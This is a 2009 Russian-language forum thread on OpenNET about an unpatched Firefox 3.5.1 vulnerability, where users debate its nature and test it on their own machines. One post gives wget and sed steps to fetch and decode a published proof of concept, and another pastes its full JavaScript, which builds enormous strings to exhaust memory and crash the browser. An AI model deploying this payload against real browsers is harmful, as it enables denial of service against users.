The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Новая уязвимость Firefox, не исправленная в версии 3.5.1, opennews (??), 19-Июл-09, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


50. "Новая уязвимость Firefox, не исправленная в версии 3.5.1"  +2 +/
Сообщение от poige (ok), 20-Июл-09, 09:36 
1) Неясно, почему вообще речь идёт о _stack_ overflow, если размещение строк происходит в heap.

2) Сейчас exploit с http://downloads.securityfocus.com/vulnerabilities/exploits/... скачивается в таком виде, что нужно вручную заменить все <, "e и т. п.. Тогда будет работать -- жрать память, пока система не скажет "баста". Но даже в этом случае, браузер не завершает работу -- на Linux x86_64.

3) Судя по всему, разработчики совершенно правы, когда говорят о том, что только для Mac OS X эта проблема более критична, в связи с ошибкой внутри системной библиотеки.

P. S. Кол-во мосек, которым не хочется включить мозг и подумать, зато так нравится обтявкать всё вокруг, включая C++, умиляет. "Ай, моська..." (c)

Ответить | Правка | Наверх | Cообщить модератору

54. "Новая уязвимость Firefox, не исправленная в версии 3.5.1"  +/
Сообщение от Абабагаламага (?), 20-Июл-09, 11:25 
Сорри, туповат. Что надо заменить на что? Я хочу проверить у себя тоже.
Ответить | Правка | Наверх | Cообщить модератору

55. "Новая уязвимость Firefox, не исправленная в версии 3.5.1"  –1 +/
Сообщение от fix (??), 20-Июл-09, 11:46 
>Сорри, туповат. Что надо заменить на что?

пля, html сущности
html_entity_decode()
cgi.unescape()

Ответить | Правка | Наверх | Cообщить модератору

57. "Новая уязвимость Firefox, не исправленная в версии 3.5.1"  +/
Сообщение от Шурек Табуреткин (?), 20-Июл-09, 14:08 
Все просто:

wget http://downloads.securityfocus.com/vulnerabilities/exploits/...

sed -i 's/</</g;s/>/>/g;s/"/"/g' 35707.html

firefox file:///`pwd`/35707.html

Ответить | Правка | Наверх | Cообщить модератору

59. "Новая уязвимость Firefox, не исправленная в версии 3.5.1"  +/
Сообщение от patsev.antongmail.com (?), 20-Июл-09, 17:13 
Firefox 3.0.1. Сделал как написано.
Открывает текст:

<html> <head> <script language="JavaScript" type="Text/Javascript">  var str = unescape("%u4141%u4141"); var str2 = unescape("%u0000%u0000"); var finalstr2 = mul8(str2, 49000000); var finalstr = mul8(str, 21000000); document.write(finalstr2); document.write(finalstr); function mul8 (str, num) { var i = Math.ceil(Math.log(num) / Math.LN2), res = str; do { res += res; } while (0 < --i); return res.slice(0, str.length * num); } </script> </head> <body> </body> </html> <html><body></body></html>

Ответить | Правка | Наверх | Cообщить модератору

74. "Новая уязвимость Firefox, не исправленная в версии 3.5.1"  +/
Сообщение от pavlinux (ok), 20-Июл-09, 20:42 
>Firefox 3.0.1. Сделал как написано.

https://www.opennet.ru/openforum/vsluhforumID3/57057.html#69

Ответить | Правка | Наверх | Cообщить модератору

80. "Новая уязвимость Firefox, не исправленная в версии 3.5.1"  +/
Сообщение от аноним (?), 20-Июл-09, 21:27 
firefox 3.5.1 x86_64 - результат тот же
Ответить | Правка | К родителю #59 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру